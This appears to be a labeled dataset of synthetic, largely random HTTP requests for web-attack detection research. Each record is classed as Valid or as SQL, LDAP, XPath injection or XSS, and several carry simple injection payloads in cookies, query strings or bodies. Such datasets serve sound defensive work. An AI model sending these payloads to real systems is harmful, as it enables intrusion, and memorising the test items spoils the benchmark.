Accept-Language: i-ml, akitu-W2;q=0.8, aioy15-n, 3Oreoiew-ndytisn1, lerzt68-te;q=0.2
Cache-Control: no-cache
Client-ip: 132.116.1.254
Cookie: mY0home= e 7'
Cookie2: $Version="96"
Date: Wed, 26 Jul 06 06:25:51 UTC
ETag: W/"9H@b1djpDU7fKGjh"
Expect: 100-continue
From: etro@rlateera.gov
If-Modified-Since: Fri, 22 Oct 04 03:46:17 UTC
If-Unmodified-Since: Mon, 08 Sep 08 05:56:52 GMT
If-Match: *
If-None-Match: "x_fmekkz9XmgoSr4mBbO"
If-Range: "8JaKfdegVSvYkPXq"
Max-Forwards: 56
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: cdaead o0tyni=dtuinus
Authorization: NTLM NGU2ZWJjc0VIaHJTc2RzaXF6Z2RwZW5veHRwc2htcm1ubGNlbDFlbQ==
Range: -89
Referer: http://r4tt5.de/aEbyil/nIxodrt/htsntlo.shtml
TE: trailers,trailers,deflate;q=0.8
Trailer: If-None-Match
User-Agent: rn93AlhTaC (tNCd9cB)
UA-CPU: 68000
UA-Disp: 533,4650,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 3364x532
Via: FTP/9.0 89.31.229.215
Transfer-Encoding: compress
Upgrade: tvEd/6.7, cuau/0.8
Warning: 193 185.105.110.73:7 "etrva5uwtemespwn" "Wed, 04 Oct 06 16:34:42 CET"
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 546551972
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47969
Start - Id: 824
class: Valid
GET /agn9rs/95Y_F0B8b6M/Kaddondsectel.png?ehoyasho3sthqen=hrWw4&gwomn=4niEm0n4rsorppse HTTP/1.0
Host: www.irnhedfo.uk
Connection: close
Accept: text/plain;q=0.9, video/quicktime
Accept-Charset: euc-tw;q=0.4, iso-8859-8-i, windows-1258, iso-8859-4
Accept-Encoding: identity, compress, deflate, compress, identity;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 97.242.61.48
Cookie: zhaqdteFeenh24= exiweab;dvhmcndeftc=24326571;e0ZOrcyjcIhen=v5Qt4siturbt;liroebGvre=6839194
Cookie2: $Version="5"
Date: Thu, 13 Jul 06 10:37:31 CET
ETag: "P@SVbqfWk7mvrnToa.f"
Expect: 100-continue
From: otea@mcanstwra.de
If-Modified-Since: Fri, 02 Feb 07 01:22:48 CET
If-Unmodified-Since: Sat, 19 May 07 18:58:04 UTC
If-Match: "_hUJBvIDdWBVzxBZde-"
If-None-Match: *
If-Range: Mon, 13 Oct 08 14:24:56 CET
Max-Forwards: 1653
MIME-Version: 3.5
Pragma: oear1izn='in'
Proxy-Authorization: NTLM czY0bW9zY3NlZ29wbXB0enRkZVJnYnNYbUtpMGlzbnZu
Authorization: Basic b3N2b246bWRvQmU=
Range: -5014,811909-578591
Referer: http://hnefQhg.uk/otTja/seer.php3
TE: trailers,gzip,deflate;q=0.2
Trailer: If-Match
User-Agent: rds8oolenaekjhh4
UA-CPU: PowerPC
UA-Disp: 801,214,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9683x567
Via: 6.4 www.rclet.jpg, HTTP/2.9 www.tninhbpp.jpg
Transfer-Encoding: identity
Upgrade: almoet/4.8, agnifh/3.7, kiSch/4.1
Warning: 424 www.o4ylbeo1.html "eOaoepcehwUc" 
X-Forwarded-For: 183.29.19.247
X-Serial-Number: 510626783025324042
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 824
Start - Id: 42770
class: SqlInjection
POST /Yttedxoosi/mBYzhKtT3/db18lnhrhimgns.msf? HTTP/1.1
Content-Length: 229
Content-Language: nhAb,hiyesneM,fkhk1
Content-Encoding: compress
Content-Location: http://iitqhzMg.ch/steh/we1i.jpg
Content-Type: application/x-www-form-urlencoded
Host: 147.158.19.160
Connection: keep-alive
Accept: image/jpeg, application/postscript;q=0.0, audio/x-wav
Accept-Charset: x-mac-turkish, x-mac-cyrillic;q=0.9
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.5
Cache-Control: no-transform
Cookie: 4oOyntthy3=nSwwn;chrleindsse=twl6q5GHEKCy;tpwiTad13a=s;15kDperlm-Ywindow.open=ass4ihm;2ll='     group     by users.id having    035=035;4hFz=6
If-Modified-Since: Sat, 17 Oct 09 10:25:47 GMT
If-Unmodified-Since: Sat, 03 Jan 04 15:52:54 GMT
Pragma: rsto=3io7mtOb
Referer: http://rteEeor.cz/sem8t/rrsHRa/hgao4l/gaensnm/9oejS.css
Trailer: Authorization
User-Agent: oyiWannt/2.8
Transfer-Encoding: identity

rfzsatnonVjaot=921&to=Fqig&eicTno8ele=208019&xpd7BinCJI=cA-yK@7TVVfe&EeuadmVcnpftc=516217&eoom0=7&oirsgtoalese1= trwhere&otsx=he6e?&s@NAix.=ofeal&3ceeewr5pmt=72776&iaeTt4v=flgozvlo&drDaAnO=73249192&EQ4dHO@WXJm=eS?can hocftp

End - Id: 42770
Start - Id: 38063
class: LdapInjection
GET /eFbrowwo7cwcont6w/Unp5al1ra7o796oei/u78@ISQ6yM/zECR0P7w0.dl5uIUZMS/hBRfg1.uE.9av5xW3DW/0t/natnsitsiceoyeoha/vxF22/twEkZGqIHejav@_cFA.jpg?in0@7Y0ctmselect=34&RSCxtermCWld_=9815192074&lwpoTpeoO=3382&D8ftpE1f=nr4-z%402tw&tonmfweeeCveeer=orXp&ni89rqlentagt=u9o&tefsmsempCepE4=343%29%28%26%28objectClass%3DoSs%29%28%7C%28sn++%3D+te%29%28cn%3Dtykm+++J*%29%29&r4s4e=99329069&ag=oe+ HTTP/1.0
Host: 63.20.25.62
Connection: keep-alive
Accept: image/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 8t-uhitp;q=0.9, Frt1-aoh2d, u-itl;q=0.0, d-f;q=0.6
Cache-Control: only-if-cached
Client-ip: 163.227.108.150
Cookie: eDaob1sllzscnn=6118333292;iekcew=aCyYJEBq@utV
Cookie2: $Version="57"
Date: Sat, 06 May 06 20:54:18 UTC
ETag: "WyvG8K_AwpOUvCzMKd"
Expect: 100-continue
From: eoMt7@ridEmrif0e.it
If-Modified-Since: Fri, 15 Oct 04 05:28:21 UTC
If-Unmodified-Since: Sun, 14 Mar 04 19:05:37 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Sep 05 12:59:27 UTC
Max-Forwards: 912
MIME-Version: 7.3
Pragma: robMf='esns'
Proxy-Authorization: Digest cnonce="iHtefan"
Authorization: NTLM c25udmFUaGFuZG1hc3l5NmEzTnN2bjBub2llb2J0cmllaWpl
Range: 77-,76-
Referer: /r5eiii.cfm
TE: gzip;q=0.2
Trailer: Accept
User-Agent: Mozilla/1.4 (X11; U; Open BSD i586 6.0; Bc-ea; rv:7.0.0) Gecko/87469509
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5823x093
Via: 8.2 32.42.123.12:6031, FTP/6.7 116.101.17.26:63, 2ha/1.9 www.ist6enno.png
Transfer-Encoding: compress
Upgrade: uw5/3.9, vdsth/9.5, so4/9.1
Warning: 825 116.151.251.79:4332 "d7aga7herbaA" 
X-Forwarded-For: 84.58.38.49
X-Serial-Number: 7355823651136546
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38063
Start - Id: 29398
class: Valid
GET /c.B2D18/e1PuK0M1ytpt/n5EaDPELEg0U3hl0/sA_zX/aqWcu9AnERsIlofpxe.nsf?sjed1taot98hen=lsG%40k%26jIfmscriptncmd&SCcmdservicesIQdn=tPNi&ENtrdivs1echobNON=et&n4E42tv=%290+adOaSNamwinnthi&met=33382028&tn2iaaijpomba=nyxEouo&@union0ehXPdI=-2twa&epidseetiahr=6127558274 HTTP/1.1
Host: www.f9nschb8.gov
Connection: koehe
Accept: image/jpeg
Accept-Charset: iso-8859-7, big5;q=0.2
Accept-Encoding: compress;q=0.1, identity
Accept-Language: unntg-d;q=0.2, t5-ieetyi;q=0.0
Cache-Control: min-fresh=546
Client-ip: 152.201.222.227
Cookie: ituieEreire=65260558;me=813654
Cookie2: $Version="476"
Date: Mon, 28 Sep 09 13:49:15 GMT
ETag: W/"r@L8Li8GcYN1uefJ"
Expect: 100-continue
From: onTs@ajeeiGu.com
If-Modified-Since: Tue, 10 Apr 07 13:48:51 UTC
If-Unmodified-Since: Sun, 06 Aug 06 03:46:12 UTC
If-Match: "jEDMXl86kapxe34zS"
If-None-Match: "D2uO224xyg80@Mfk"
If-Range: *
Max-Forwards: 8610
MIME-Version: 0.8
Pragma: s='thiichi'
Proxy-Authorization: Digest nc=4fB5Bddd
Authorization: NTLM VG80ZW9odG5pb25uZW9kZGV5U0NhSXNoaWl0SzJvbHZlOA==
Range: 61375-,6799-
Referer: http://rfsec.it/nixh/eynlrtI/ttoc.asmx
TE: chunked,trailers,chunked;q=0.7
Trailer: Range
User-Agent: DmgcEcE/6.6
UA-CPU: MIPS
UA-Disp: 2709,267,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0011x3310
Via: asaisi/5.1 226.170.244.97:2, 6.3 54.67.50.70
Transfer-Encoding: hedn; dtlieeg=rira9
Upgrade: hoonng/3.0, etnsa/4.8, wUr/4.5, pgotom/4.2, r7etDt/6.9
Warning: 637 216.250.224.103 "tew7rd" "Sat, 20 Sep 08 06:41:50 GMT"
X-Forwarded-For: 2.168.186.132
X-Serial-Number: 55211271758
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29398
Start - Id: 38626
class: LdapInjection
GET /8gg0fsrjo/lamndt/oWaNK5EE.5C3Nn1B/e0rITvQ_R0MoldtBrii/r46B-jh/8ViframeiCDdinput@AS8w0/lJXElDT8q3zBGwindow.openA/CtienieUidydsioftf/gIfewqdkt/qgi59documentufOz/73VYmwu7iu/u9.swf?iitdtusn=unr8enmstdilnt9dso&uoo=ftox%29%28%26%28objectClass+++%3D++++us*%29&oiHGr=6 HTTP/1.1
Host: www.a3e5m.org:2505
Connection: crtt1hte
Accept: */*;q=0.7
Accept-Charset: x-mac-cyrillic;q=0.9, iso-8859-7, windows-1254;q=0.9, x-mac-cyrillic
Accept-Encoding: deflate;q=0.8, gzip, gzip, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 64.108.85.141
Cookie: ndu=58976;iecw25z=8296253953;latCL6mY-=630;iRvdeiNuuaej=9863;hbltCgBedOYDTeu=eVjqHmc6T
Cookie2: $Version="1"
Date: Sat, 05 May 07 18:18:32 UTC
ETag: "KGrg9qHcq5lQEPfL.Dz"
Expect: 100-continue
From: snRe@zteSps5r.net
If-Modified-Since: Wed, 02 May 07 18:39:13 GMT
If-Unmodified-Since: Fri, 25 Nov 05 11:42:33 GMT
If-Match: "oi2eAACtN9W1lC7bi"
If-None-Match: "KyMtUkL_ncxN-ZsaD"
If-Range: *
Max-Forwards: 217
MIME-Version: 8.5
Pragma: eei9mes='h'
Proxy-Authorization: Digest cnonce="uda3ny"
Authorization: maxa tcucs=osen1ec
Range: 907-3621,092-84571,369-460
Referer: http://www.wxmkg.it/tiOndwRl.mpg
TE: trailers,trailers
Trailer: Accept
User-Agent: ysQ1oKeJi http://www.Ia5ed.biz
UA-CPU: StrongARM
UA-Disp: 397,637,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 601x4009
Via: HTTP/0.9 137.63.203.23, Raae/5.9 www.alf7.js, 8.4 69.166.218.179
Transfer-Encoding: if7ene; mijr=tfzy84
Upgrade: hiaeAa/4.4, r8ta/3.6, rte3z/8.6, iadrea/0.5, ia5gs/1.7
Warning: 385 www.ietrrth1.htm "wefuh94ogoiYectles" 
X-Forwarded-For: 126.96.147.176
X-Serial-Number: 325446948
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38626
Start - Id: 10223
class: Valid
GET /binputBTHJpse6rlBG/uum/rr55a4o/boymedgd/y4scsXnZFI.php3?rroXsy=0428510516&itnpft=tlmasaa54af4&sop8ns=46504056&oTe=1947&ooa6traneherdtm=TrRmc&teronntdameeO0e=71wF&Id0esa=njFg&iaanet=e%40w-Px1 HTTP/1.1
Host: www.m0ms5.st
Connection: close
Accept: image/jpeg
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: Yo-lmizighn;q=0.5, nr-tzaaeorf, arndas-eoeTe5;q=0.6
Cache-Control: max-stale=3508
Client-ip: 90.210.213.62
Cookie: rpzglyesMo=0;e00fs=m48Ras0ato a
Cookie2: $Version="0"
Date: Fri, 21 Jul 06 09:27:48 GMT
ETag: W/"HXPPFyAZym8FglXwyC"
Expect: 100-continue
From: ftprpo@hletlteaS.be
If-Modified-Since: Sun, 21 Jan 07 09:15:12 CET
If-Unmodified-Since: Sun, 27 Sep 09 08:04:49 UTC
If-Match: *
If-None-Match: "jUZWeOr6QWpv1ubvtFiq"
If-Range: *
Max-Forwards: 1127
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM bG9leGlSbnBrdWVuMVhoZXJtMGR4blNlbHRlbHdsYXRpMHNocmlvZDlwZG52em8=
Authorization: Basic YXNzc241YzpleGVs
Range: -621
Referer: /shSt/scyha/n7ltseSg/voij0E/utorw.txt
TE: chunked;q=0.9,trailers
Trailer: Transfer-Encoding
User-Agent: zo8mtpw
UA-CPU: Sparc
UA-Disp: 118,0565,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 148x7930
Via: 6.3 162.252.92.16, 2.6 87.9.254.115
Transfer-Encoding: gzip
Upgrade: e34/2.8, srytrj/3.4, igIE5/7.9, eidtoe/3.9, xiv8g/0.2
Warning: 857 230.15.158.56 "A5ekosc" "Tue, 27 May 08 01:52:19 CET"
X-Forwarded-For: 119.252.21.3
X-Serial-Number: 9799950017867099
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10223
Start - Id: 24600
class: Valid
GET /estbatt/a1mqTw6dETY/ht4utddrii/hxr2RxE/cosualurisEsEedwnxe.html?fsq=47&neo2wvgdrd=kCPnfw&MwtUk=681&ig07g=et+4leuL&8vie9ypE=089&otL=pvLlwrelyol&zYef=kQ5DOOaX6 HTTP/1.1
Host: www.Anrm.com
Connection: keep-alive
Accept: application/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=256
Client-ip: 144.153.248.99
Cookie: 2i8zwget@u_=32469374;meR2untedtssc=7841
Cookie2: $Version="04"
Date: Wed, 27 Dec 06 01:30:57 GMT
ETag: W/"4dS.u20O0Z3P8h."
Expect: 100-continue
From: naao@dsGtaOrc0.net
If-Modified-Since: Fri, 21 Jul 06 24:08:49 UTC
If-Unmodified-Since: Fri, 05 Feb 10 06:44:13 GMT
If-Match: "m-z4I@UIBdRpxQhARc"
If-None-Match: "MN6Z1kcVdo4O2KoRV3Vz"
If-Range: "tsmZj5mWAtrO58C"
Max-Forwards: 64
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic ZWhUTzpqaFF0bGQ=
Authorization: Digest qop=auth
Range: 5150-,581355-
Referer: /yI7p/eiOiIe/e0bbb.conf
TE: deflate;q=0.3,deflate,chunked;q=0.9
Trailer: Host
User-Agent: Mozilla/8.2 (compatible; swie2; Linux i386; tenp98hn; msrar; oai3o6y)
UA-CPU: StrongARM
UA-Disp: 678,816,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8083x5393
Via: HTTP/3.4 www.nneeiuo.jpeg:1, 9.5 166.109.46.103:4278, 5.3 118.180.11.132
Transfer-Encoding: deflate
Upgrade: 69nEsd/6.6, sueaen/7.3, n3e5/3.9
Warning: 152 www.ooridO.gif "UeeEwtsltb3wwa8sst8o" 
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 04810456
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24600
Start - Id: 34128
class: Valid
POST /rxopuoaen/si2/sJidCG1nuHoGTS/aRWcOlgB1Xn/nhp.php4? HTTP/1.0
Content-Length: 275
Content-Language: ie
Content-Encoding: compress
Content-Location: http://oe9eoo.it/ecsttL/nEbh2/olahhko/etseehit/tiJr0.bin
Content-MD5: QXR1cHN6ZXRvenl1OGlsZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 27 Aug 09 22:17:41 GMT
Last-Modified: Fri, 03 Jun 05 21:44:32 UTC
Host: 80.124.113.245
Connection: keep-alive
Accept: text/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=341
Client-ip: 138.89.107.219
Cookie: 4eDs=286;Od2RjY.perlcHoa=tuzsR3ElewVfenapu
Cookie2: $Version="8"
Date: Fri, 27 Jun 08 10:01:33 UTC
ETag: "a5Vc5HpAHAdS6Kb3dE"
Expect: 100-continue
From: nepatoig@daos1pitqE.uk
If-Modified-Since: Sat, 31 Mar 07 19:19:18 UTC
If-Unmodified-Since: Fri, 23 Oct 09 22:09:57 GMT
If-Match: "cXj2n-vmymFjxQ5FE"
If-None-Match: *
If-Range: Mon, 03 Jul 06 04:28:09 UTC
Max-Forwards: 7
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: ot1o thnbfS=d3eeuo
Authorization: Basic eG5tdzpuZXRiVGh2
Range: -500777,66-
Referer: /ote9th.mspx
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.7 (Windows; U; Win 9x 4.9; pm-ie; rv:7.4.4) Gecko/01488755
UA-CPU: MIPS
UA-Disp: 654,4575,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 995x590
Via: FTP/9.4 208.68.136.99
Transfer-Encoding: identity
Upgrade: e1e/1.0, 4det/7.3, 8t7kr/3.5, cltiom/7.6
Warning: 295 www.ocnotj.css "efnmenvtT" 
X-Forwarded-For: 148.127.25.65
X-Serial-Number: 18830507621799
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rYZEiKLGfrom=e xfW&connectK_EzKs=73886&6Ip=873668&nereelhemOd=s/lhu|oV&tCteEil=4&6zcfAjHSA=h5ntepNtiwIu&zechub=0ssi%ahnal7eg@&ia9xt5lE0bn3ti=794135&rE=430630&tlvsizTG9rnicd=ee-xg8htsenl&bl0aoacOM8=yp9StVsECx&lrln=vTEpY&1ean1=ls&deiharu5v=iAcP7VmR&M2aeepdoee=m5z2XwPzD

End - Id: 34128
Start - Id: 46808
class: XSS
POST /e7K1W/27TmkXmVXwdeleteb/tMw21clz.j9.t-mD1/mailFJViframeSRnKVlsj2/dtZ7h/echoaloQ/ZhttpOincludejb/mfUXs12/JLanHwhereftp/f8e/copyplibNDcTBwxml/nlefARDRbxi.jpg? HTTP/1.0
Content-Length: 386
Content-Language: so,na,oetw
Content-Encoding: deflate
Content-Location: /UAketagt/tdfsu/Yeqvtthx.exe
Content-MD5: Ym56c294bnNhaHM1bGZpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 29 Oct 04 21:35:33 UTC
Last-Modified: Wed, 21 Dec 05 20:04:04 GMT
Host: 217.255.14.42
Connection: keep-alive
Accept: text/*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: htao-roFua;q=0.1, tspqIa-eaIlselw, cse-ue, Ysy31t-ilsTniip;q=0.8, onirrl-b5m;q=0.4
Cache-Control: min-fresh=56343
Client-ip: 171.200.231.167
Cookie: samopenls6Kbinzi=vHueqLhT;Raetkice=e-7fGi;it6e=n1s4ubll
Cookie2: $Version="3"
Date: Tue, 03 Apr 07 07:08:59 CET
ETag: "y@tKjzaOGXeONi4MFD"
Expect: crttsci=ei2cr
From: wdvoio@iotd9eelwd.de
If-Modified-Since: Wed, 05 Apr 06 20:41:27 GMT
If-Unmodified-Since: Thu, 15 Oct 09 14:28:36 GMT
If-Match: "MEGrXqwucpum@xi9idO5"
If-None-Match: "QrGLECH423pat1DHX@"
If-Range: Tue, 04 Jan 05 02:15:48 UTC
Max-Forwards: 1352
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: oand kioW=rs9ay
Authorization: Basic NFZzTnl2Om5vb2Q=
Range: 175390-78,55-,908690-
Referer: http://www.ttlj.cz/srsddt6r/a6odiaeo/Bg4teet.exe
TE: trailers,trailers,trailers
Trailer: Host
User-Agent: Mozilla/0.0 (Windows; U; Windows NT 5.1; en-Nt; rv:6.8.7) Gecko/99773211
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 818x5674
Via: 2.3 www.anzI.shtml
Transfer-Encoding: nhPr; u3bs2aRe=daOe
Upgrade: 5dpmt/2.8, kAt/9.2, PrmjAp/1.4, moi/3.4
Warning: 793 241.179.195.131 "halAIevnm" "Wed, 27 Apr 05 17:07:05 CET"
X-Forwarded-For: 254.13.104.181
X-Serial-Number: 80684101
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rtitnLehi69sw=pDsaaevfYXI&rRs=<![CDATA[<!--]]   ><script   >[alert    ('lpt6htliOu');]//--></script>&3aeorctxtnooj=4865&ionTW0cogctesn=3&eti6o20tbci=sEMFmL&fLclk3scriptYphtaccesJ=022&jea8nSdft=edhrctaastiaral&9Tu4=252607483&00uA8YnL25=a0outnt@mrskyo&0ihhmreMhAiee=imtUmq2aOAzH&i8itnovs=cyCmBN&tjrdiihtptE=uecho&ic=rjeoevicopyOat&0v=IRwe

End - Id: 46808
Start - Id: 28320
class: Valid
GET /eMoN4HLE3w_3z/t9eiel6tl8aNn8ei/sI5-qbsC6d-M9y/tnpnnsITwtyspt1is/thgsC.cfm?itstreaoaiwui=iy6&96nMcr=nclei&butit=81&manh0uoffenat=01trnukj.6&x9Piscriptct0=8262410139&QnPstyleFoNmail=einocneFg0&badteep4ErIes=odw&7sag=%3C%3Bh&sti=erKs&.IinputMiSO=n2co&uRetle9p2tsyut=apmlwNOSSrKetet&vhsor2x=Aj8t8j%3CA%29eeUte HTTP/1.0
Host: www.epfAi0eol.net
Connection: close
Accept: video/*, text/plain;q=0.1, application/*
Accept-Charset: x-mac-japanese;q=0.3
Accept-Encoding: compress;q=0.7
Accept-Language: oep-hGattpr
Cache-Control: only-if-cached
Client-ip: 33.66.117.12
Cookie: m6Wg4Lv=nLlp;otAsteken5ht=go9;zEumstdtN=ilhbhPi9;gTv0HoQEnupdateKY=stid;oar==0b;aGee=2t
Cookie2: $Version="3"
Date: Sat, 19 Sep 09 14:23:42 GMT
ETag: "8Twi41_@XztXskW"
Expect: 100-continue
From: uo4ee7@tp9n.net
If-Modified-Since: Sun, 15 Jul 07 13:26:31 GMT
If-Unmodified-Since: Fri, 21 May 04 12:14:33 GMT
If-Match: "Pn3FhhiJvRCpcYbf"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic bGFpdG9zZDpudHJuY2I=
Authorization: Gntt itshsBlh=a1bxuye
Range: 1084-,9187-,-3
Referer: http://www.Yaoouo.it/061vit.msf
TE: chunked,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.0 (Windows; U; Win98 2.9; af-lg; rv:2.6.0) Gecko/27418647
UA-CPU: PowerPC
UA-Disp: 5474,653,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 680x9650
Via: 5.5 29.190.36.177, 9.7 www.bneas8sx.gif
Transfer-Encoding: compress
Upgrade: amcAh/7.2, emad3/8.4, oatab/2.4
Warning: 911 196.37.232.17 "eetcelei" 
X-Forwarded-For: 146.40.109.99
X-Serial-Number: 4245119888
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28320
Start - Id: 49674
class: XPathInjection
GET /lR3a6.qF/tXE/2ipmimdlelED.mspx?rnhxtTr5dnNa=202&icelaeebaOhanr9=%5Dykns&opE2aUAshtj3nax=182&Eens=Y6having&AD28Z8=%28i++++%3C++++count%28lwi6q%2Fchild%3A%3Atext%28%29%29++++and+++++j+%3C++++count%28hues%2Fchild%3A%3Acomment%28%29%29+++++and++k++++%3C++count%28mhUreD%2Fchild%3A%3A*%29+++%29&emzinrhrLrih=9372253848 HTTP/1.1
Host: 96.102.242.229:98999
Connection: close
Accept: */*
Accept-Charset: iso-8859-9, x-mac-icelandic, windows-1254;q=0.4, windows-1254
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 74.210.240.133
Cookie: swrtca7Ti=ioiIbw;ilani4tbser4=egWlbAYFnpv;eomwe9u=64
Cookie2: $Version="85"
Date: Thu, 21 Apr 05 22:47:37 UTC
ETag: W/"8vg1Wz8V9qRfAnK"
Expect: 100-continue
From: ohsiewp@laEeuatptq.st
If-Modified-Since: Thu, 17 Jan 08 06:37:38 CET
If-Unmodified-Since: Thu, 19 May 05 19:05:20 UTC
If-Match: *
If-None-Match: "7yh7PjH.UkEXLT-YYEG"
If-Range: *
Max-Forwards: 73
MIME-Version: 5.9
Pragma: s9t6o=Orf
Proxy-Authorization: fefd 0ae8ehin=q6gL
Authorization: sdle meWstur=sniaulb
Range: -09
Referer: /85hnr/ern5e/nfhhh/lOryEaag/t9Ieezw.jsp
TE: trailers
Trailer: Range
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 7.5; ce-xb; rv:1.2.9) Gecko/79885639
UA-CPU: Sparc
UA-Disp: 6990,614,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 491x233
Via: 4.0 www.YtdEt.gif, oeAt/8.1 197.64.186.196, 5.3 www.yNte.png
Transfer-Encoding: identity
Upgrade: uva/6.8
Warning: 381 115.122.86.133 "cnay5hst5e7r" 
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49674
Start - Id: 6722
class: Valid
PUT /rBrep3S/tBVq/erreeathrreAalEv/hjpOR/_uxNB4P5r.Fnetcatd/i7wp-fRUsT/tqci2e7ehaeedlEarr/ttee1tIrwtdseu/h-EtN-j/ioVqM2ogrH5V7oHJ.qg/omipPph_EJY.nsf? HTTP/1.0
Content-Length: 58
Content-Language: ao
Content-Encoding: gzip
Content-Location: http://ustbiat.com/dmeTs/ade6c.asmx
Content-MD5: YW42NXdoYWltNm9iM2Fvdg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Nov 05 09:43:53 UTC
Last-Modified: Thu, 09 Aug 07 01:44:23 UTC
Host: www.tu2pe.de
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 5e-nNgcse4e;q=0.4, 3dme3in-eesffsn, wiwasZoi-fbcb;q=0.1, EraRr-ei0iup
Cache-Control: only-if-cached
Client-ip: 228.32.232.19
Cookie: h1eoeda5d=eievoWs36btrlbmwhh;esttqi=849;6tdneiD=List
Cookie2: $Version="46"
Date: Tue, 29 Mar 05 18:37:01 UTC
ETag: W/"oBmHbSaKdm6RPnPO"
Expect: seLeerFe
From: uo9blte@Ic9o.com
If-Modified-Since: Fri, 27 Jul 07 14:08:39 GMT
If-Unmodified-Since: Sat, 12 Sep 09 18:46:28 CET
If-Match: *
If-None-Match: "FKzlYgJkIGc6JZEv0"
If-Range: Sat, 27 Feb 10 02:20:48 CET
Max-Forwards: 3365
MIME-Version: 7.6
Pragma: e=nwry7fop
Proxy-Authorization: Digest qop=auth
Authorization: cunaee otad=esmQ1jz0
Range: 38-1,16854-
Referer: /gke2Rhe/csq1n/bnottzn.gz
TE: gzip,deflate
Trailer: Max-Forwards
User-Agent: r1aOeseyada
UA-CPU: Sparc
UA-Disp: 053,477,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2276x763
Via: 9.3 100.5.15.151:4
Transfer-Encoding: identity
Upgrade: rxTi/0.2, yuint/8.4, nhwc8/4.6
Warning: 825 18.154.201.40:52524 "alxpneotthwrdet" 
X-Forwarded-For: 6.218.56.206
X-Serial-Number: 48758
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

5tlpe0erODT=ethc<gio&mtlju8osb26Et=Hs&iytemenaaddNtg=ihT

End - Id: 6722
Start - Id: 32004
class: Valid
GET /sae6nsaat1/tean/m4Intt.nsf?run=teAspu&ewwacItrma=egnZX&xe9ugtt6=627521&5eYtsatiUqolez=udyI-G1Ddhz&5rs=9nhhnhrh&0fghytidEe=ocyekmb&rausLu3=61&actohaecj=linkylsantsf&eeohf9aDwtOh=Ds HTTP/1.0
Host: 127.132.29.131
Connection: keep-alive
Accept: image/*;q=0.9, application/*
Accept-Charset: windows-1257, iso-8859-4;q=0.9, gb2312;q=0.1, big5;q=0.3, iso-8859-8
Accept-Encoding: 
Accept-Language: Rcdh-lfarihh;q=0.7, msnhesul-eph, S-A1epth;q=0.4
Cache-Control: no-transform
Client-ip: 57.1.164.246
Cookie: 8n5rHxx.htpassc=qhr0om;CfhIz5N=025
Cookie2: $Version="93"
Date: Mon, 14 Dec 09 18:41:03 GMT
ETag: "pnf6HD.9@9XiVd9c7Z"
Expect: 100-continue
From: btva@toc2c.st
If-Modified-Since: Fri, 16 Oct 09 24:19:25 UTC
If-Unmodified-Since: Sun, 25 Feb 07 09:57:55 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 03 Jan 05 06:04:11 UTC
Max-Forwards: 1495
